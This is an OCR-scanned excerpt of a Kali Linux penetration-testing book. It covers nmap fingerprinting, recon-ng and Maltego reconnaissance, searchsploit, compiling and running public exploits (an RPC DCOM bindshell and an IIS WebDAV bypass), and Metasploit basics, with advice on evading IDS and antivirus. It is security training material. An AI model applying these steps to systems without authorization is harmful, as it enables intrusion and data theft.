• Port scanning, even when done slowly, can impact a network. Some older 
network equipment and equipment from specific vendors will lock when 
receiving or transmitting a port scan, thus turning a scan into a denial of 
service attack. 

• Tools used to scan a port, particularly nmap, are being extended with regards 
to functionalities. They can also be used to detect vulnerabilities and exploit 
simple security holes. 

Fingerprinting the operating system 

Determining the operating system of a remote system is conducted using two types 
of scans: 

• Active fingerprinting: The attacker sends normal and malformed packets to 
the target and records its response pattern, referred to as the fingerprint. By 
comparing the fingerprint to a local database, the operating system can be 
determined. 

• Passive fingerprinting: The attacker sniffs, or records and analyses the packet 
stream to determine the characteristics of the packets. 

Active fingerprinting is faster and more accurate than passive fingerprinting. In Kali, 
the two primary active tools are nmap and xprobe2. 
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The nmap tool injects packets into the target network and analyses the response that 
it receives. In the following screenshot, the -0 flag commands nmap to determine 
the operating system. Because it injects the packet into the target, the accuracy of 
the determination of the operating system by nmap is based on the number of open 
ports. It is usually effective at differentiating Windows from Unix systems, but it may 
not provide very specific information, such as differentiating between various Unix 
kernels. The following screenshot shows results from an nmap scan of a Windows 
system. Only a few ports on the target system are available for testing, so it cannot 
differentiate between Windows 7 enterprise and Windows XP sp3 

root@kali: # nmap -sS -0 173.231. 

Starting Nmap 6.46 ( http://nmap.org ) at 2014-63-11 15:55 EDT 
Nmap scan report for IP-173-231 - 
Host is up (0.29s latency). 

Not shown: 954 closed ports, 44 filtered ports 

PORT STATE SERVICE 

23/tcp open telnet 

SG/tcp open http 

Device type: general purpose 

Running: Microsoft Windows 7 | XP 

OS CPE: cpe :/o :mic rosoft :windows_7 :: enterprise cpe : /o : mic rosoft :windows_xp : : sp3 
OS details: Microsoft Windows 7 Enterprise, Microsoft Windows XP SP3 



A related program, xprobe2, uses different TCP, UDP, and ICMP packets to bypass 
firewalls and avoid detection by IDS/ IPS systems. xprobe2 also uses fuzzy pattern 
matching — the operating system is not identified as definitely being one type; 
instead, it is assigned the probability of being one of several possible variants. 

As you can see in the following screenshot, this allows the tester to test 
vulnerabilities that are specific to the operating system variants; this specificity 
increases the chances of success and minimizes the risks that can occur when an 
exploit is attempted with the wrong tool. 



[+] Primary guess: 



[+] 


Host 


199.181. 


Running 


OS: 


"HP UX 11. Ox" 


(Guess 


probability : 


95%) 


[+] 


Other guesses: 














[+] 


Host 


199.181. 


Running 


OS: 


"OpenBSD 3.4" 


(Guess 


probability : 


90%) 


[+] 


Host 


199.181. 


Running 


OS: 


"OpenBSD 3.5" 


(Guess 


probability : 


90%) 


[+] 


Host 


199.181. 


Running 


OS: 


"OpenBSD 3.6" 


(Guess 


probability : 


90%) 


[+] 


Host 


199.181. 


Running 


OS: 


"OpenBSD 3.7" 


(Guess 


probability : 


90%) 


[+] 


Host 


199.181. 


Running 


OS: 


"Cisco IOS 11 


.2" (Guess probability: 86%) 



[ 78 ] 



Chapter 3 



Note that it is simple for the target system to hide the true operating system. Since 
fingerprinting software relies on packet setting, such as time-to-live or the initial 
windows size, changes to these values or other user-configurable settings can change 
the tool results. Some organizations actively change these values to make the final 
stages of reconnaissance more difficult. 



The final goal of the enumeration portion of reconnaissance is to identify the 
services and applications that are operational on the target system. If possible, the 
attacker would want to know the service type, vendor, and version to facilitate the 
identification of any vulnerability. 

The following are some of the several techniques used to determine active services: 

• Identify default ports and services: If the remote system is identified as 
having a Microsoft operating system with port 8 0 open (the WWW service), 
an attacker may assume that a default installation of Microsoft IIS is installed. 
Additional testing will be used to verify this assumption (nmap). 

• Banner grabbing: This is done using tools such as amap, netcat, nmap, 
and Telnet. 

• Review default web pages: Some applications install with default 
administration, error, or other pages. If attackers access these, they will 
provide guidance on installed applications that may be vulnerable to attack. 
In the following screenshot, the attacker can easily identify the version of 
Apache Tomcat that has been installed on the target system. 

Heme Dd cumt'iitalian COnllgurACiGn Exjunplfec Wikt MdiHirtgi LteES Find Help 

Apache Tomcat/7.0.32 pache Software Foundation 

K f I r* / i w ill u* a n a* *r Ih « r n V 



Determining active services 








Recommended Reading: 

Security Ccn^idE'raE^QnsHOW -TO 
Manager Applicalwn HOW -TO 
ClustoMrigrecSsKm Regltcalion HffW-TQ 



App 



HOST 



Developer Quicfc Start 

fmmSLAasHmsn 



BhIbllaaa 

&ESJ 2 Hf£<tWSS!* 









[ 79 ] 




Active Reconnaissance and Vulnerability Scanning 



• Review source code: Poorly configured web-based applications may 
respond to certain HTTP requests such as head or options with a 
response that includes the web server software version, and possibly, the 
base operating system or the scripting environment in use. In the following 
screenshot, netcat is launched from the command line and used to send 
raw head packets to a particular website. This request generates an error 
message (404 not found); however, it also identifies that the server is running 
Microsoft IIS, Version 7.5. 

rootgkali: # nc www. .ca 80 
HEAD / HTTP/1.0 

HTTP/1.1 404 Not Found 

Connection: close 

Content -Length : 1245 

Date: Wed, 12 Mar 2014 16:05:02 GMT 

Content -Type : text/html 

Server: Mic rosoft -IIS/7 .5 

X-Url Master- 404 : Request ed_4G4 

Set -Cookie: um_IsMobile=False; path=/; HttpOnly 

X -Powered -By : ASP.NET 



Employing comprehensive 
reconnaissance applications 

Although Kali contains multiple tools to facilitate reconnaissance, many of the tools 
contain features that overlap, and importing data from one tool into another is 
usually a complex manual process. Most testers select a subset of tools and invoke 
them with a script. 

Comprehensive tools focused on reconnaissance were originally command-line tools 
with a defined set of functions; one of the most commonly used was Deepmagic 
Information Gathering Tool (DMitry). DMitry could perform whois lookups, 
retrieve netcraft.com information, search for subdomains and e-mail addresses, and 
perform TCP scans. Unfortunately, it was not extensible beyond these functions. 

Recent advances have created comprehensive framework applications that combine 
passive and active reconnaissance; we'll review nmap, recon-ng, and malt ego. 
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nmap 

Traditionally, nmap was perceived as a simple mapping tool that provided data 
on host and port availability, as well as some additional data such as the probable 
operating system of target devices. 

The Nmap Scripting Engine (NSE) has transformed nmap into a tool that can 
conduct passive and active reconnaissance, and even perform basic vulnerability 
scanning (a full list of scripts is available at http : //nmap . org/nsedoc/). 

Because scripts are written in the Lua scripting language, it is easy for the 
penetration testing community to modify and release scripts. Presently, scripted 
functions include the following: 

• Reconnaissance of IPv4 and IPv6 DNS data 

• Identifying the presence of web application firewalls, IDS, IPS, and other 
protective controls 

• Testing the firewall rulesets (via firewalk) and attempting to bypass 
the firewall 

• Harvesting user names from target and online sites 

• Brute-force guessing of passwords against a variety of services 
and applications 

• Crawling the target network to identify network shares 

• Extracting of EXIF metadata from images in a defined website 

• Geographical localization of IP addresses 

• Conducting network attacks such as IPv6 packet flooding 

• Vulnerability scanning, including fuzzing and SQL injection testing 

As you can see, the ability to script nmap activities using an extensible language such 
as Lua has increased the importance of this tool. 

A useful script is Marc Ruef's vulscan (http : //www . computec . ch/mruef / 

software / nmap nse vulscan- 1.0. tar . gz), which combines the fingerprinting 

feature of nmap (using the -sv flag) with lookups against major vulnerabilities, such 
as MITRE, OSVDB, and Security Focus. 

Once you have downloaded the script package, untar the file and move the script 
files to usr/ share/nmap/ scripts. 
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To invoke one of the scripts from the command line, use the - -script flag, and 
then identify the script name. One script that is frequently used is nmap's general 
vulnerability scanner, launched using the following command: 

root@kali:~# nmap -sV - - script=vulscan . nse digitaldef ence . ca 

In this particular case, the vulnerability scan did not identify any vulnerabilities with 
known exploits, as shown in the following screenshot: 



root@kali: # nmap -s V - -sc ript=vulscan digit aide fence .ca 

Starting Nmap 6.40 ( http://nmap.org ) at 2013-08-12 21:27 EDT 
Nmap scan report for digitaldefence .ca (54.236.190.114) 

Host is up (0.0069s latency) . 

rDNS record for 54 .236 . 190 . 114 : ec2-54-236-190-114.compute-l.amazonaws.com 

Not shown: 997 filtered ports 

PORT STATE SERVICE VERSION 

22/tcp open sftp ProFTPD mod_sftp 0.9.8 

| vulscan: scipvuldb - http://www.scip.ch/en/7vuldb (0 findings): 

j No findings 

I 

| eve - http://cve.mitre.org (0 findings) : 
j No findings 

I 

| osvdb - http://www.osvdb.org (0 findings) : 
j No findings 

I 

| securityfocus - http://www.securityfocus.com/bid/ (0 findings) : 
j No findings 




A must-have script is the SpiderLabs script to screenshot web services. 
It requires the wkhtmltoimage tool to be downloaded (http : // 
wkhtmltopdf . googlecode . com) and placed in the /usr/local / 
bin folder. The screenshot script itself should then be downloaded 
(https : / /github . com/ SpiderLabs/Nmap-Tools/blob/ 
mas ter /NSE /http -screenshot .nse) and placed in /usr/local/ 
share/ nmap/ scripts. When invoked, this script produces a visual 
record of all the identified web services, making it easier to select a 
target for testing later. 



The recon-ng framework 

The recon-ng framework is an open source framework for conducting 
reconnaissance (passive and active). 

Like the Metasploit Framework and Social Engineer Toolkit, recon-ng uses a 
modular framework. Each module is a customized cmd interpreter, preconfigured 
to perform a specific task. 

The recon-ng framework and its modules are written in Python, allowing 
penetration testers to easily build or alter modules to facilitate testing. 
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The recon-ng tool leverages third-party APIs to conduct some assessments; this 
additional flexibility means that some activities undertaken by recon-ng may be 
tracked by those parties. Users can specify a custom UserAgent string or proxy 
requests to minimize alerting the target network. 

All data collected by recon-ng is placed in a database, allowing you to create 
various reports against the stored data. The user can select one of the report 
modules to automatically create either a CVS report, or an HTML report. 

To use recon, perform the following steps: 

1. If recon-ng is not installed on your version of Kali, use the 
following command: 

apt-get install recon-ng 

2. To start the application, enter recon-ng at the prompt as shown in 
the following screenshot. The start screen will indicate the number of 
modules present, and the help command will show the commands 
available for navigation. 



root@kali: # recon-ng 

JJJ JJJJ JJJ JJJ J J J J JJJ 

J J J J J J JJ J JJ J J 

JJJ JJJ J J J J J J JJJJ J J J J JJJ 
J J J J J J J JJ J JJ J J 

J J JJJJ JJJ JJJ J J J J JJJ 

[recon-ng vl.31 Copyright (C) 2013, Tim Tomes (@LaNMaSteR53) ] 

[59] Recon modules 
[6] Discovery modules 
[3] Reporting modules 
[1] Experimental modules 



recon-ng > help 



Commands (type [ help | ?] <topic>) : 



back 

banner 

exit 

help 

info 

keys 

load 

query 

record 

reload 

resource 

run 

search 

set 

shell 

show 

use 



Exits current prompt level 

Displays the banner 

Exits current prompt level 

Displays this menu 

Displays module information 

Manages framework API keys 

Loads selected module 

Queries the database 

Records commands to a resource file 

Reloads all modules 

Executes commands from a resource file 
Not available 

Searches available modules 
Sets global options 
Executed shell commands 
Shows various framework items 
Loads selected module 
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3. To show the available modules, type show at the recon-ng> prompt. To load 
a specific module, type load followed by the name of the module. Hitting 
the tab key while typing will autocomplete the command. If the module has 
a unique name, you can type in the unique part of the name, and the module 
will be loaded without entering the full path. 

Entering inf o, as shown in the following screenshot, will provide you 
with information on how the module works, and where to obtain API keys 
if required. 

recon-ng > load recon/contacts/gather/http/web/j igsaw 
recon -ng [jigsaw] > info 

Name : 

Jigsaw Contact Enumerator- 
Path : 

modules/ recon/contact s/gat he r/http/web/j igsaw. py 
Author: 

Tim Tomes (@LaNMaSteR53) 

Desc ription : 

Harvests contacts from Jigsaw.com and updates the 'contacts' table of the da 
tabase with the results. 

Options : 

Name Current Value Reg Description 



COMPANY yes target company name 

KEYWORDS no additional keywords to identify company 

recon-ng [jigsaw] > | 
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4. Once the module is loaded, use the set command to set the options, and then 
enter run to execute, as shown in the following screenshot: 

recon-ng [jigsaw] > set company digitaldefence 

COMPANY => digitaldefence 

recon-ng [jigsaw] > run 

[*] Gathering Company IDs... 

[*] Query : http ://www. j igsaw.com/FreeTextSearchCompany . xhtml ?opCode=search&f reeT 
ext=digitaldefence+ 

[*] Unique Company Match Found: 362937 

[*] Gathering Contact IDs for Company 1 362937 1 .. . 

[*] Query : http ://www. j igsaw.com/SearchContact . xhtml ?rpage=lSopCode=showCompDir& 
company I d=362937 

[*] Query : http ://www. j igsaw . com/Sea rchContact . xhtml ? rpage=2SopCode=showCompDi r& 

company I d=362937 

[*] Gathering Contacts... 

[*] [78 0572 8] Robert Beg gs - Chief E xecu tive Officer [Burlington, ON - Canada) 



In general, testers rely on recon-ng to do the following: 

• Harvest contacts using whois, j igsaw, linkedin, and twitter 
(use the mangle module to extract and present e-mail data) 

• Identify hosts 

• Identify geographical locations of hosts and individuals using hostop, 
ipinf odb, maxmind, uniapple, and wigle 

• Identify host information using netcraft and related modules 

• Identify account and password information that has previously been 
compromised and leaked onto the Internet (the pwnedlist modules, 
wascompanyhacked, xssed, and punkspider) 

Maltego 

Maltego (www . paterva . com) is an open source intelligence and forensics application. 
The community version included with Kali sets limits on the size of searches; 
however, it is an excellent tool for visualizing relationships among data that use 
data mining and link analysis. 
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Maltego allows you to enumerate personal information, linking a particular person 
with a company, e-mail addresses, websites, social networking groups, and phone 
numbers. It also facilitates passive and active reconnaissance of who is information, 
domain names, DNS information, IP addresses, and netblocks. 

1. To open the application, enter maltego as a command prompt. The first time 
you open it, you will be required to register and verify your e-mail address 
with Paterva. 

2. Once you have completed registration and updating of transforms, 
you will be presented with a multipaned GUI that allows you to 
examine the connections between various data objects, as shown in 
the following screenshot: 




Maltego relies on a series of transforms or modules that are stored in a 
palette on the left-hand side of the application. Transforms are selected by 
picking them from the column on the left and then dragging them into the 
centre of the application. 

By default, the icon may be called pantera.com when initially selected; 
however, you can use the data manipulation areas in the right-hand column 
to rename and change data. 

Several different transforms exist in the community edition; these are 
sorted into several groups such as Devices, Infrastructure, Personal, 
Locations, Penetration Testing, and Social Network, as shown in the 
following screenshot: 
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Domain 

An internet domain 
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MX Record 

A DNS mail exchange record 

NS Record 

A DNS name server record 

Netblock 

An internet Autonomous System (AS) 

URL 

An internet Uniform Resource Locator ( 



I* 



Website 

An internet website 



Personal 



©" Locations 
©" Penetration Testing 
®" Social Network 



3. Drag the appropriate transform onto the work sheet and right-click to reveal 
the transformations that will be completed against that transform's identity. 
Keep in mind that if you select the All option, processing will take 
a significant amount of time. 

The ability to analyze relationships is particularly useful in performing social 
engineering attacks. For example, if the target's website contains multiple links to 
another website, an attacker could use this relationship for a phishing attack. 
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Vulnerability scanning 

Vulnerability scanning employs automated processes and applications to 
identify vulnerabilities in a network, system, operating system, or application 
that may be exploitable. 

When performed correctly, a vulnerability scan delivers an inventory of devices 
(both authorized and rogue devices), known vulnerabilities that have been actively 
scanned for, and usually a confirmation of how compliant the devices are with 
various policies and regulations. 

Unfortunately, vulnerability scans are loud — they deliver multiple packets that are 
easily detected by most network controls and make stealth almost impossible to 
achieve. They also suffer from the following additional limitations: 

• For the most part, vulnerability scanners are signature based — they can only 
detect known vulnerabilities, and only if there is an existing recognition 
signature that the scanner can apply to the target. To a penetration tester, 
the most effective scanners are open source and allow the tester to rapidly 
modify code to detect new vulnerabilities. 

• Scanners produce large volumes of output, frequently containing false- 
positive results that can lead a tester astray; in particular, networks with 
different operating systems can produce false-positives with a rate as high as 
seventy percent. 

• Scanners may have a negative impact on the network — they can create 
network latency or cause the failure of some devices (refer to the Network 
Scanning Watch List at www . diginin j a . org, for devices known to fail as a 
result of vulnerability testing). 

• In certain jurisdictions, scanning is considered as hacking, and may constitute 
an illegal act. 

There are multiple commercial and open source products that perform vulnerability 
scans. In Kali, scanning tools can be found in the Vulnerability Analysis 
submenu, as well as the Web Vulnerability Scanners menu; however, the primary 
vulnerability scanner is Open Vulnerability Assessment System (OpenVAS). 

Kali supports the installation of additional scanners. If it is decided to sacrifice 
stealth for completeness during testing, always employ at least two different 
scanners to minimize false-positive results. Recommended scanners include 
Nexpose (www . rapid7 . com) and the venerable Nessus (www . nessus . org). 
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Summary 

During active reconnaissance, the attackers face a very real chance of their activities 
being identified, putting them at risk. This must be balanced against the need to map 
a network, find open ports, and determine the operating system and applications 
that are installed. 

To reduce risks, attackers must adopt stealthy scanning techniques. Manual 
approaches are used to create slow scans; however, this approach is not always 
effective. Therefore, attackers take advantage of tools such as the Tor network and 
various proxying applications to hide their identity. 

In the next chapter, we will focus on analyzing the data from the reconnaissance 
stages and from other sources, and using it to plan and execute a remote exploit 
against a target network or system. We will review various attack techniques and 
tools and focus on how to ensure that the exploit cannot be detected by normal 
means. We will also examine remote exploitation as a continuous process — once you 
have compromised one target, how to leverage that success to pivot to new targets. 
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The goal of passive and active reconnaissance is to identify the exploitable security 
flaws that are most likely to support the tester's or attacker's objective (denial of 
service, theft, or modification of data). The exploit phase of the kill chain focuses on 
creating the access to achieve the objective — either stopping the access to a target by 
creating a denial of service or the more common approach of establishing persistent 
access to the target from the attacker. 

The penetration tester must be concerned with the following aspects of the 
exploit phase: 

• Was the target fully characterized? If the attacker does not understand the 
network and host architecture of the target, the attack will fail and there will 
be an increased risk of detection. 

• Is the exploit well known, with defined actions on the target system? 

An uncharacterized exploit could have unintended consequences when 
employed and the resulting damage could have a negative impact on the 
testing process. Testers should validate all exploits in a known setting prior 
to use. 

• Is the exploit being conducted from a remote location or is it local on the 
target system? A remote exploit is safer for the attacker because the chances 
of being positively identified are lesser; however, a local exploit gives the 
attacker more control over the exploit's action and reduces the possibility 
of detection. 

• What are the required post-exploit activities? If the attacker needs to 
exfiltrate data from the target, then the exploit must support establishing 
an interactive connection. 

• Is persistent access to the compromised system required, or is the 
compromise going to be short term? This will drive the requirement for 
a stealthy approach. 
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Thousands of exploitable vulnerabilities have been identified, and most are 
associated with at least one proof-of-concept code or technique to allow the system to 
be compromised. Nevertheless, the underlying principles that govern success are the 
same across networks, operating systems, and applications. 

In this chapter you will learn: 

• Threat modeling 

• Using online and local vulnerability resources 

• Exploiting a remote target using the Metasploit Framework 

• Exploiting multiple targets with Armitage 

• Bypassing IDs and antivirus detection 

Threat modeling 

The passive and active reconnaissance phases map the target network and 
system and identify vulnerabilities that may be exploitable to achieve the attacker's 
objective. During this stage of the attacker's kill chain, there is a strong bias for 
action — testers want to immediately launch exploits and demonstrate that they can 
compromise the target. However, an unplanned attack may not be the most effective 
means of achieving the object, and it may sacrifice the stealth that is needed to 
achieve the objective of the attack. 

Penetration testers have adopted (formally or informally) a process known as 
threat modeling, which was originally developed by network planners to develop 
defensive countermeasures against an attack. 

Penetration testers and attackers have turned the defensive threat modeling 
methodology on its head to improve the success of an attack. Offensive threat 
modeling is a formal approach that combines the results of reconnaissance and 
research to develop an attack strategy. An attacker has to consider the available 
targets and identify the type of targets listed as follows: 

• Primary targets: These targets when compromised, these targets will 
immediately support the objective. 

• Secondary targets: These targets may provide information (security controls, 
password and logging policies, and local and domain administrator names 
and passwords) to support an attack or allow access to a primary target. 

• Tertiary targets: These targets may be unrelated to the testing or attack 
objective, but are relatively easy to compromise and may provide 
information or a distraction from the actual attack. 
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For each target type, the tester has to determine the approach to be used. A single 
vulnerability can be attacked using stealth techniques or multiple targets can be 
attacked using a volume of attacks in order to rapidly exploit a target. If a large-scale 
attack is implemented, the noise in the defender's control devices will frequently cause 
them to minimize logging on the router and firewall or even fully disable them. 

The approach to be used will guide the selection of the exploit. Generally, attackers 
follow an attack tree methodology when creating a threat model, as shown in the 
following diagram: 




Exploit 

vulnerability in 
web access 
interface 



The attack tree approach allows the tester to easily visualize the attack options that 
are available and the alternative options that can be employed if a selected attack is 
not successful. Once an attack tree has been generated, the next step of the exploit 
phase is to identify the exploits that may be used to compromise vulnerabilities in 
the target. 

Using online and local vulnerability 
resources 

Together, passive and active reconnaissance identifies the attack surface of the 
target, that is, the total number of points that can be assessed for vulnerabilities. 

A server with just an operating system installed can only be exploited if there are 
vulnerabilities in that particular operating system; however, the number of potential 
vulnerabilities increases with each application that is installed. 
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Penetration testers and attackers must find the particular exploits that will 
compromise known and suspected vulnerabilities. The first place to start the search 
is at vendor sites; most hardware and application vendors release information about 
vulnerabilities when they release patches and upgrades. If an exploit for a particular 
weakness is known, most vendors will highlight this to their customers. Although 
their intent is to allow customers to test for the presence of the vulnerability 
themselves, attackers and penetration testers will take advantage of this information 
as well. 

Other online sites that collect, analyze, and share information about vulnerabilities 
are as follows: 

• The National Vulnerability Database that consolidates all public 
vulnerability data released by the US Government available at 
http : //web . nvd. nist . gov/view/vuln/ search 

• Secunia available at http : / / secunia . com/ community/ 

• Open Source Vulnerability Database Project (OSVDP) available at 

http : //www. osvdb . org/search/advsearch 

• Packetstorm security available at http : / /packetstormsecurity . com/ 

• SecurityFocus available at http : / /www . securityf ocus . com/ 
vulnerabilities 

• Inj3ct0r available at http://i3 3 7day.com/ 

• The Exploit Database maintained by Offensive Security available at 
http : / / www . db-exploit . com 

The exploit database is also copied locally to Kali and it can be found in the /usr/ 
share/ exploitdb directory. Before using it, make sure that it has been updated 
using the following command: 

cd /usr/share/exploitdb 

wget http : //www. exploit-db . com/ archive . tar ,bz2 
tar -xvjf archive . tar ,bz2 
rm archive . tar ,bz2 

To search the local copy of exploitdb, open a terminal window and enter 
searchsploit and the desired search term(s) in the command prompt. This will 
invoke a script that searches a database file ( . csv) that contains a list of all exploits. 
The search will return a description of known vulnerabilities as well as the path to 
a relevant exploit. The exploit can be extracted, compiled, and run against specific 
vulnerabilities. Take a look at the following screenshot, which shows the description 
of the vulnerabilities: 
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Desc ription 
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Path 



Bulletproof FTP Server 2.4.0.31 Local Privilege Escalation Exploit 
Bulletproof FTP Client 2.45 Remote Buffer Overflow Exploit (PoC) 

Bulletproof FTP Client 2.63 Local Heap Overflow PoC 
Bulletproof FTP Client (.bps File) Local Stack Overflow PoC 
Bulletproof FTP Client 2009 (.bps) Buffer Overflow Exploit (SEH) 

BulletProof FTP 2.63 b56 Client Malformed 1 .bps' File Stack Buffer Overflow 
BulletProof FTP Client 2010 - Buffer Overflow Vulnerability 



/windows/ remote/2530 . py 
/windows/dos/7571 .txt 
/windows/dos/7589 . pi 
/windows /I oc al /8420 . py 
/windows/ remot e/9998 . c 
/windows/dos/18716 .txt 




The search script scans for each line in the CSV file from left to right, so 
the order of the search terms is important — a search for oracle 10g 
will return several exploits, but lOg oracle will not return any. Also, 
the script is weirdly case sensitive; although you are instructed to use 
lower case characters in the search term, a search for Bulletproof 
FTP returns no hits, but bulletproof FTP returns seven hits, and 
bulletproof f tp returns no hits. More effective searches of the CSV 
file can be conducted using the grep command or a search tool such as 
KWrite (apt-get install kwrite). 



A search of the local database may identify several possible exploits with a 
description and a path listing; however, these will have to be customized to your 
environment, and then compiled prior to use. Copy the exploit to the /tmp directory 
(the given path does not take into account that the /windows/remote directory 
resides in the /platforms directory). 

Exploits presented as scripts such as Perl, Ruby, and PHP are relatively easy to 
implement. For example, if the target is a Microsoft II 6.0 server that may be vulnerable 
to a WebDAV remote authentication bypass, copy the exploit to the root directory and 
then execute as a standard Perl script, as shown in the following screenshot: 

root@kali: # perl 8806.pl 

$ Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit 
$ written by ka0x <ka0x©l [at ] gmail .com> 

$ 25/O5/2009 

usage : 

perl $0 <host> <path> 
example : 

perl $0 localhost dir/ 

perl $0 localhost dir/file. txt 
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Many of the exploits are available as source code that must be compiled before use. 
For example, a search for RPC-specific vulnerabilities identifies several possible 
exploits. An excerpt is shown in the following screenshot: 



root@kali:/usr/share/exploitdb# searchsploit rpc 
Desc ription 



Path 



MS Windows RPC Locator Service Remote Exploit 
MS Windows 2000 RPC DCOM Interface DoS Exploit 
MS Windows (RPC DCOM) Remote Buffer Overflow Exploit 

MS Windows (RPC DCOM) Remote Exploit (w2k+XP Targets) 

MS Windows RPC DCOM Remote Exploit (18 Targets) 

MS Windows (RPC DCOM) Remote Exploit (48 Targets) 

MS Windows (RPC DCOM) Remote Exploit (Universal Targets) 



/windows/ remote/5 . c 
/windows/dos/61 .c 
/windows/ remote/64 . c 
/windows/ remote/66 . c 
/windows/ remote/69 . c 
/windows/ remote/70 . c 
/windows/ remote/76 . c 



The RPC DCOM vulnerability identified as 76 . c is known from practice to be 
relatively stable. So, we will use it as an example. To compile this exploit, copy it 
from the storage directory to the /tmp directory. In that location, compile using GCC 
with the command as follows: 

root@kali:~# gcc 76.c -o 76.exe 

This will use the GNU Compiler Collection application to compile 76 . c to a file with 
the output (-o) name of 76 . exe, as shown in the following screenshot: 

root@kali:/usr/share/exploitdb/platforms/windows/remote# cp 76. c /tmp 
root@kali:/usr/share/exploitdb/platforms/vd_ndows/remote# cd /tmp 
rootQkali: # Is 

76. c 

root(3kali:/tm[ # gcc 76. c -o 76 . 0 x 0 



When you invoke the application against the target, you must call the executable 
(which is not stored in the /tmp directory) using a symbolic link as follows: 

root@kali:~# ,/7 6.exe 

The source code for this exploit is well documented and the required parameters are 
clear at the execution, as shown in the following screenshot: 
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rootgkali: /tmp# .776.exe 

RPC DCOM exploit coded by . : [ocl92 .us] : . Security 
Usage : 



.776.exe -d <host> [options] 
Options : 



-d 
-t 
- r 

-P 

-1 



Hostname to attack [Required] 

Type [Default: O] 

Return address [Default: Selected 
Attack port [Default: 135] 
Bindshell port [Default: 666] 



from target] 



Types : 

0 [Gx0018759f] : [Win2k -Unive rsal ] 

1 [0x0100139d] : [WinXP -Universal] 



Unfortunately, not all exploits from exploit database and other public sources 
compiled as readily as 76 . c. There are several issues that make the use of such 
exploits problematic, even dangerous, for penetration testers listed as follows: 

• Deliberate errors or incomplete source code are commonly encountered as 
experienced developers attempt to keep exploits away from inexperienced 
users, especially beginners who are trying to compromise systems without 
knowing the risks that go with their actions. 

• Exploits are not always sufficiently documented; after all, there is no 
standard that governs the creation and use of code intended to be used 
to compromise a data system. As a result, they can be difficult to use, 
particularly for testers who lack expertise in application development. 

• Inconsistent behaviors due to changing environments (new patches applied 
to the target system and language variations in the target application) may 
require significant alterations to the source code; again, this may require a 
skilled developer. 

• There is always the risk of freely available code containing malicious 
functionalities. A penetration tester may think that he is conducting a 
proof of concept (POC) exercise and will be unaware that the exploit has 
also created a backdoor in the application being tested that could be used by 
the developer. 

To ensure consistent results and create a community of coders who follow consistent 
practices, several exploit frameworks have been developed. The most popular 
exploitation framework is the Metasploit Framework. 
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The Metasploit Framework 

The Metasploit Framework (MSF) is an open source tool designed to facilitate 
penetration testing. Written in the Ruby programming language, it uses a modular 
approach to facilitating exploits. This makes it easier to develop and code exploits, 
and it also allows for complex attacks to be easily implemented. 

MSF can present multiple interfaces to the backend modules that control 
exploitation (console, CLI, and web). We will use the console interface for its speed, 
because it presents the attack commands, and it has the required configuration 
parameters in an easy-to-under stand interface. To access this interface, enter 
msf console in a command prompt or select it from a drop-down menu such as 
Top 10 Security Tools. The following screenshot shows the splash screen when the 
application launches: 



/ \ 

(J 0 0 [J 

\ _ / 

o_o \ MSF 

\ 

III wwil 



Large pentest? List, sort, group, tag and search your hosts and services 
in Metasploit Pro -- type 1 go_p ro 1 to launch it now. 



= [ metasploit v4 .7 .0-2013082802 [core:4.7 api:1.6] 
+ -- --=[ 1161 exploits - 641 auxiliary - 180 post 
+ -- --=[ 310 payloads - 30 encoders - 8 nops 



The MSF consists of modules that are combined to affect an exploit. The modules 
and their specific functions are as follows: 

• Exploits: The code fragments that target specific vulnerabilities. Active 
exploits will exploit a specific target, run until completed, and then exit 
(for example, a buffer overflow). Passive exploits wait for incoming hosts, 
such as web browsers or FTP clients, and exploit them when they connect. 

• Payloads: These are the malicious code that implement commands 
immediately following a successful exploitation. 
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• Auxiliary modules: These modules do not establish or directly support 
access between the tester and the target system; instead, they perform 
related functions such as scanning, fuzzing, or sniffing that support the 
exploitation phase. 

• Post modules: Following a successful attack, these modules run on 
compromised targets to gather useful data and pivot the attacker deeper 
into the target network. We will learn more about the post modules in 
Chapter 5, Post Exploit - Action on the Objective. 

• Encoders: When exploits must bypass antivirus defenses, these modules 
encode the payload so that it cannot be detected using signature matching 
techniques. 

• No operations (NOPs): These are used to facilitate buffer overflows 
during attacks. 

These modules are used together to conduct reconnaissance and launch attacks 
against targets. The steps for exploiting a target system using MSF can be 
summarized as follows: 

1. Choose and configure an exploit (the code that compromises a specific 
vulnerability on the target system). 

2. Check the target system to determine if it is susceptible to attack by the 
exploit. This step is optional and is usually omitted to minimize the 
detection. 

3. Choose and configure the payload (the code that will be executed on the 
target system following a successful exploitation. For example, a reverse 
shell from the compromised system back to the source). 

4. Choose an encoding technique to bypass detection controls (IDs/ IPs or 
antivirus software). 

5. Execute the exploit. 

The next example represents a simple attack against the target Linux-based 
operating system Metasploitable2. It is available online at http : //sourcef orge . 
net /pro j ec t s /met asploi table/ files/Metasploitable2. Metasploitable2 
was designed to be vulnerable to attack, and it contains known and characterized 
vulnerabilities that provide a standard platform for training and for validating 
exploit tools. 
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When installed as a virtual machine (covered in Appendix, Installing Kali Linux), 
Metasploitable can be scanned using nmap, which identifies open ports and associated 
applications. An excerpt of the nmap scan is shown in the following screenshot: 

root@kali: # nmap -sV 192.168.43.129 

Starting Nmap 6.40 ( http://nmap.org ) at 2G13-09-03 12:25 EOT 
Nmap scan report for 192.168.43.129 
Host is up [0.00017s latency). 

Not shown: 977 closed ports 



PORT 


STATE 


SERVICE 


VERSION 


21/tcp 


open 


ftp 


vsftpd 2.3.4 


22/tcp 


open 


ssh 


OpenSSH 4.7pl Debian 8ubuntul [protocol 2.0) 


23/tcp 


open 


telnet 


Linux telnetd 


25/tcp 


open 


smtp 


Postfix smtpd 


53/tcp 


open 


domain 


ISC BIND 9.4.2 


80/tcp 


open 


http 


Apache httpd 2.2.8 [[Ubuntu) DAV/2) 


111/tcp 


open 


rpcbind 


2 (RPC #100G00) 


139/tcp 


open 


netbios-ssn 


Samba smbd 3.X [workgroup: WORKGROUP) 


445/tcp 


open 


netbios-ssn 


Samba smbd 3.X [workgroup: WORKGROUP) 


512/tcp 


open 


exec 


netkit-rsh rexecd 



Several applications were identified by nmap in the preceding example. As a tester, 
we should investigate each one for any known vulnerabilities. One of the first places 
to start is, Metasploit's own collection of exploits. This can be searched from the 
following command line using: 

msf> search samba 

The returned exploits for the samba service are listed and each of them is assigned 
a relative ranking of how successful they are at achieving an exploit. The following 
screenshot shows an excerpt of the available samba exploits: 



Matching Modules 



Name 

esc ription 



Disclosure Date Rank D 



auxiliary/admin/smb/samba_syml±nk_t rave rsal 
amba Symlink Directory Traversal 

a u x il i a ry /dos /samb a /I s a_a d d p r i v s_heap 
